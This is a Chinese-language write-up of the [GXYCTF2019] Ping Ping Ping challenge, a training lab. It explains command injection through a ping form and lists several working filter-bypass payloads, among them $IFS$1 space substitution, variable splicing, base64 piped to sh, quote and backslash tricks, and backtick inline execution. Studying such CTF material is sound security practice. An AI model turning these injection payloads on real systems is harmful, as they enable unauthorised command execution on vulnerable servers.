有关[GXYCTF2019]Ping Ping Ping 做题总结

    技术2022-07-11  169

    关于PING命令

    之前见这种类型的题很少,这次遇到了,就总结一下,以便下次遇到不会手足无措。 PING命令其实就是用于确定本地主机是否能与另一台主机成功交换(发送与接收)数据包,再根据返回的信息,就可以推断TCP/IP参数是否设置正确,以及运行是否正常、网络是否通畅等。但其实我们这种题并不是真的让你去PING某个IP;而是让你利用终端去执行你想要的语句

    回到我们的题

    打开是这样子的。给了/?p= 后边应该是我们所想要执行的语句。先随便ping一下 有回显,我们在在后边继续执行语句。先查看一下ls; 这里发现终端有一个flag.php和一个Index.php cat flag.php一下试一试 发现空格被过滤了,去百度查询了一下绕过空格的几个办法

    ***空格过滤 ***

    ${IFS}替换$IFS$1替换${IFS替换 替换<和<>重定向符替换 替换

    我们一个个来试一下 用第一个${IFS}时候发现符号被过滤了

    使用第二个$IFS$1发现可以 说明{}被过滤了,但出现了这样说明flag被过滤了 去看一下Index.php 发现源码出来了。可以看到flag.<>.{}都被过滤了。bash也被过滤。这时候我们可以想着试一下变量拼接.

    ?ip=1;a=g;cat$IFS$1fla$a.php;

    打开源码即可看到flag 不过在网上看大佬们的wp发现还有其他更牛逼的解法。列一下以备以后学习。

    1.base64编码

    如题目一样就是用base64进行编码,再用命令进行解读。从而达到执行。 这里用的是sh,sh的大部分脚本都可以在bash下运行 附上大佬的payload

    echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

    前边Y2F0IGZsYWcucGhw是cat flag.php的base64编码.在用base64 -d命令进行执行 这里边的|是管道符。去查了一下总结一下

    常见管道符

    Windows系统支持的管道符

    1.管道符| |直接执行后面的语句 2.管道符|| ||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语 3.管道符& &前面和后面命令都要执行,无论前面真假 这里附上大佬的网站https://www.ghtwf01.cn/index.php/archives/273/

    言归正传。接下来说另外的几种方法

    2.单引号、双引号绕过

    ca"t fl''ag

    可以使用这种方法去绕过有时候的cat 和flag 但在本题单双引号被ban了

    3.反斜线绕过

    ca\t fl\ag

    本题中反斜线也被ban了

    4.$1、$2等和 $@绕过

    c$1at gh$@twf01.txt

    ***

    如果cat被过滤,可以用下边的方法进行绕过~~


    (1)more:一页一页的显示档案内容

    (2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页

    (3)head:查看头几行

    (4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示

    (5)tail:查看尾几行

    (6)nl:显示的时候,顺便输出行号

    (7)od:以二进制的方式读取档案内容

    (8)vi:一种编辑器,这个也可以查看

    (9)vim:一种编辑器,这个也可以查看

    (10)sort:可以查看

    (11)uniq:可以查看

    (12)file -f:报错出具体内容

    最后说一个最强的payload

    内敛绕过

    内联,就是将反引号内命令的输出作为输入执行。

    ?ip=127.0.0.1;cat$IFS$1`ls`

    这样直接全部代码都出来了,这大佬也太强了吧,直接秒题 学到了学到了

    总结

    1.学会了对空格的替换 2.学会了利用sh命令利用base64编码执行想要的命令 3.内敛绕过,真是tql

    Processed: 0.008, SQL: 9